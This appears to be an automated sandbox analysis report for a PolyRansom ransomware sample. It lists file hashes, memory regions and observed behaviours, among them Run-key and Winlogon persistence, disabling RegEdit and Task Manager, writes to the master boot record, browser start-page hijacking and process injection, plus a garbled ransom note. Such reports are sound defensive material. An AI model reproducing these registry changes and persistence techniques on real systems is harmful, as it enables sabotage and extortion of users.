SHA512 909d0a2ec4af33c374d7453926e5999badd2f9fa79d0648a7308f63911f673ae34ec275917999199e9fb3a669af5c4aa460e7639c5e346f261decd28b520039a

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 03baeba6b4224371cca7fa6f95ae61c0
SHA1 8731202d2f954421a37b5c9e01d971131bd515f1
SHA256 61a9e3278b6bcc29a2a0405b06fb2a3bbcb1751c3dd564a8f94cc89ea957ec35
SHA512 386643b0a52b6b1a53e81a8500d040b6415e532ebaffd1be8d1afd4ccb10f6c0342cf734b688ec803b960339284c8d9669e638b1648d9cc734cf7367659c7fd0

memory/2176-220-0x0000000000000000-mapping.dmp

memory/2316-237-0x0000000000000000-mapping.dmp

memory/2340-239-0x0000000000000000-mapping.dmp

memory/1600-240-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2252-241-0x0000000000400000-0x0000000000423000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 8803d517ac24b157431d8a462302b400
SHA1 b56afcad22e8cda4d0e2a98808b8e8c5a1059d4e
SHA256 418395efd269bc6534e02c92cb2c568631ada6e54bc55ade4e4a5986605ff786
SHA512 38fdfe0bc873e546b05a8680335526eec61ccc8cf3f37c60eee0bc83ec54570077f1dc1da26142488930eabcc21cb7a33c1b545a194cbfb4c87e430c4b2bfb50

memory/320-242-0x0000000000400000-0x0000000000CFB000-memory.dmp

memory/2284-235-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 e1b69c058131e1593eccd4fbcdbb72b2
SHA1 6d319439cac072547edd7cf2019855fa25092006
SHA256 b61c53f4137c41aa0a5538fc9a746034b3a903cc4b1b3c8b5f3d3118e1e2bd8f
SHA512 161a5923dc3a6507cbee3b547edcef4fbfe1dc6a04832c2472b1e635d758d1503a61361c2a83a13a0d8e4607516fda4ae6462a74df66b20a7c93174bbcc7129c

memory/2284-244-0x0000000000400000-0x0000000000432000-memory.dmp

memory/2116-245-0x0000000000400000-0x0000000000843000-memory.dmp

memory/1464-243-0x00000000004F0000-0x0000000000637000-memory.dmp

memory/1068-246-0x00000000010F0000-0x000000000112C000-memory.dmp

memory/2392-248-0x0000000000000000-mapping.dmp

memory/2380-249-0x0000000000000000-mapping.dmp

memory/2568-251-0x0000000000000000-mapping.dmp

memory/1012-253-0x0000000000400000-0x0000000000439000-memory.dmp

memory/2620-255-0x0000000000000000-mapping.dmp

memory/2612-256-0x0000000000000000-mapping.dmp

memory/2664-257-0x0000000000000000-mapping.dmp

memory/2580-254-0x0000000000000000-mapping.dmp

memory/2684-259-0x0000000000000000-mapping.dmp

memory/2676-258-0x0000000000000000-mapping.dmp

memory/2728-261-0x0000000000000000-mapping.dmp

memory/2736-262-0x0000000000000000-mapping.dmp

memory/2568-265-0x0000000000220000-0x0000000000223000-memory.dmp

memory/2184-264-0x0000000001D00000-0x0000000001D67000-memory.dmp

memory/780-269-0x0000000000120000-0x0000000000159000-memory.dmp

memory/2340-270-0x0000000010000000-0x0000000010010000-memory.dmp

memory/2252-274-0x0000000000240000-0x0000000000263000-memory.dmp

memory/2252-272-0x0000000000240000-0x0000000000263000-memory.dmp

memory/2116-277-0x0000000000850000-0x00000000008B0000-memory.dmp

memory/2252-276-0x0000000000240000-0x0000000000263000-memory.dmp

memory/2184-267-0x0000000000400000-0x000000000054F000-memory.dmp

memory/2568-266-0x0000000000400000-0x000000000044F000-memory.dmp

memory/2580-279-0x0000000001FE0000-0x0000000002012000-memory.dmp

memory/2796-282-0x0000000000000000-mapping.dmp

memory/2580-287-0x0000000002010000-0x0000000002042000-memory.dmp

memory/320-286-0x0000000000400000-0x0000000000CFB000-memory.dmp

memory/2864-281-0x0000000000000000-mapping.dmp

memory/2876-280-0x0000000000000000-mapping.dmp

memory/2852-278-0x0000000000000000-mapping.dmp

memory/780-289-0x0000000000120000-0x0000000000159000-memory.dmp

memory/2116-288-0x00000000034C0000-0x00000000034C3000-memory.dmp

memory/2864-290-0x0000000000400000-0x0000000000439000-memory.dmp

memory/3064-292-0x0000000000000000-mapping.dmp

memory/2260-293-0x0000000000000000-mapping.dmp

memory/320-294-0x0000000000400000-0x0000000000CFB000-memory.dmp

memory/2284-296-0x0000000000400000-0x0000000000432000-memory.dmp

memory/2376-295-0x0000000000000000-mapping.dmp

memory/964-297-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/584-299-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

memory/1752-298-0x0000000000400000-0x0000000000438000-memory.dmp

memory/1868-300-0x0000000000400000-0x0000000000410000-memory.dmp

memory/1692-302-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2000-303-0x0000000000400000-0x0000000000450000-memory.dmp

memory/1624-301-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/320-304-0x0000000000400000-0x0000000000CFB000-memory.dmp

memory/2620-305-0x0000000000160000-0x0000000000192000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-09-29 12:38

Reported

2022-09-29 12:40

Platform

win10v2004-20220812-en

Max time kernel

43s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

Signatures

Checks for common network interception software

evasion

Enumerates VirtualBox registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\WINDOWS\\Web\\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AVPCC = "C:\\WINDOWS\\Cursors\\avp.exe" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Legitimate hosting services abused for malware hosting/C2

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "DANGER" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Äëÿ òîãî ÷òîáû âîññòàíîâèòü íîðìàëüíóþ ðàáîòó ñâîåãî êîìïüþòåðà íå ïîòåðÿâ ÂÑÞ èíôîðìàöèþ! È ñ ýêîíîìèâ äåíüãè, ïðèøëè ìíå íà e-mail [email protected] êîä ïîïîëíåíèÿ ñ÷åòà êèåâñòàð íà 25 ãðèâåíü.  îòâåò â òå÷åíèå äâåíàäöàòè ÷àñîâ íà ñâîé e-mail òû ïîëó÷èøü ôàèë äëÿ óäàëåíèÿ ýòîé ïðîãðàììû." C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\AnVi\splash.mp3 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Program Files (x86)\AnVi\virus.mp3 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\WINDOWS\Web C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperOriginX = "210" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperOriginY = "187" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\MenuShowDelay = "9999" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\sTimeFormat = "ÕÓÉ" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Use FormSuggest = "Yes" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Modifies Internet Explorer start page

stealer
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\REGFILE\SHELL\OPEN\COMMAND C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3388 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
PID 3388 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
PID 4788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Windows\SysWOW64\sc.exe
PID 4788 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Windows\SysWOW64\sc.exe
PID 4788 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Windows\SysWOW64\sc.exe
PID 4788 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Windows\System32\Conhost.exe
PID 4788 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Windows\System32\Conhost.exe
PID 4788 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Windows\System32\Conhost.exe
PID 4788 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
